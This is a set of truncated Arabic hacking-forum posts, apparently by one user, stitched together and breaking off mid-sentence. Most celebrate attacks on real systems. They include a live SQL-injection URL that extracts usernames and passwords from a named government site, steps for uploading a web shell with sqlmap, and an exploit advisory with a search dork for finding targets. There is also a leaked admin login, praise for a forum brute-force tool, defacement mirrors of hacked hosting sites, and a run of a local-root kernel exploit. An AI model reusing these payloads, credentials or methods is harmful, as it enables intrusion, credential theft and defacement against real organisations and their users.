السلام عليكم
لنفرض انت على اليوزر spiral وسحبت كونفق الهدف على اليوزر jordan
تيجي تحاول تتصل بالقاعدة او تحاول رفع اندكس من اي سكربت ما يقبل ويجيك الآتي:
Access denied for user 'spiral_jordan'@'localhost' (using password: YES)
الحل يا عزيزي انك تتصل بالسيرفر عكسي بإحدى طرق...
السلام عليكم
رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
هذه الخاصية موجودة في اداة sqlmap وشفتها مشروحة في منتدى اجنبي وحبيتها اشرحها لكم
ندخل في الشرح على طول
اولا: نفتح موجة الأوامر ونذهب للمسار التالي عن طريق الأمر
cd /pentest/database/sqlmap
ثانيا: نطبق الأمر التالي
./sqlmap.py...
رد: طريقة حجب اي موقع من جهازك
بالنسبة لي انا استخدم فايرفوكس هناك اضافة معينة للفايرفوكس تمنع الاعلانات
اذا كنت تستخدم متصفح فايرفوكس احكيلي عشان انزل لنك الاضافة هنا
السلام عليكم
بعد انقطاع فترة كبيرة حبيت ارجعلكم بثغرة قوية من اكتشافي
####
# Exploit Title: Free Hosting Manager V2.0 SQL Injection Vulnerability
# Author: Spiral
# E-mail: for-hacker@hotmail.com
# Google Dork: inurl:clients/packages.php?id=1
# Tested on: ***91;Windows 7***93;
# Vendor...
رد: موقع حكومي مصاب asp
اول مرة ادخل القسم هنا هههه يلا مش مشكلة
تفضلوا الموقع محقون جاهز :)
http://caoayanis.gov.ph/announce.asp?id=-6+union+select+1,concat%28myusername,0x3a3a,mypassword%29,3,4+from+webuser--
رد: Private brute force vbulletin - تخمين المنتديات . . s1a4a
السلام عليكم
مالكم يا جماعة داقين بالرجال
الاداة موجودة من زمان وهي برمجة اجنبية اول شي ما حد يفكرها عربية يعني :P
فكرة الاداة واضحة واللي يقول مو شغالة يجرب يغير البروكسيات
الاداة جربتها وناجحة 100%
سلام
رد: ثغرة قوية في مواقع الاستضافات :)
بالنسبة لرفع الاندكس روح على اليمين تلاقي تعديل على القوالب ومنها اختار الاستايل وعدل على ملف header
اما لرفع شيل حاولت اعدل ملف php لكن اعطاني انه يمنع التعديل على ملفات php وجاري بحث عن طريقة لرفع شيل
رد: ثغرة قوية في مواقع الاستضافات :)
حبيبي الطريقة ناجحة 100%
شوف انا اخترقت من هالثغرة ثلاث استضافات وهي التسجيل
http://zone-h.org/mirror/id/18248864
http://zone-h.org/mirror/id/18248899
http://zone-h.org/mirror/id/18248888
لكن الثغرة لما انتشرت الشباب العربي هجم عليها بسرعة وغيروا اليوزر...
السلام عليكم
الدورك في في جوجل
by am4ss
بعد الرابط اكتب
admincp
اليوزر: aler t@am4ss.com
الباس: kawkawa
لكن شيل الفراغ في اليوزر بسبب التشفير في منتدى العناكب
السلام عليكم
هذا الشرح لفتح بورت في مودم Livebox والشرح بسيط من دون صور او فيديو
1- ادخل الى صفحة المودم وضع اليوزر والباسوورد http://192.168.1.1
2- بعد الدخول اضغط على LAN server
3- اضغط على Add
4- * Server name : اكتب اسم البرنامج او اي شي
* Access activated : خليها Yes
* Protocol ...
Hi all ...
This is a new local root wich working for >=2.6.39 kernals ..
Such as 3.0.0-15
Usr@H4x0r~/Desktop$ gcc CVE-2012-0056-Mempodipper.c -o CVE-2012-0056-Mempodipper
Usr@H4x0r~/Desktop$ ./CVE-2012-0056-Mempodipper
===============================
= Mempodipper =
=...
السلام عليكم
اذهب إلى المسار التالي:
C:\windows\system32\drivers\etc
وابحث عن ملف اسمه:
Hosts
قم بفتح هذا الملف بالمفكرة واضف رابط الموقع بعد الاي بي الخاص به
مثال:
ip www.name.com
ثم قم بحفظ الملف
سلام عليكم
الســــلام عليكم شباب ..
اليوم نزل ريموت جديد للإصدار المصاب 2.6.x وبصراحة الظاهر قوي جدا .. ولاكن الترجمة شوية غلبتني وإن شاء الله بنزله خلال كم ساعه بلكثير ...
Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
http://www.milw0rm.org/exploits/8556
اللحين لنعرف كيف الريموت...
الســـــلام عليكم شباب ...
ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .
والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى...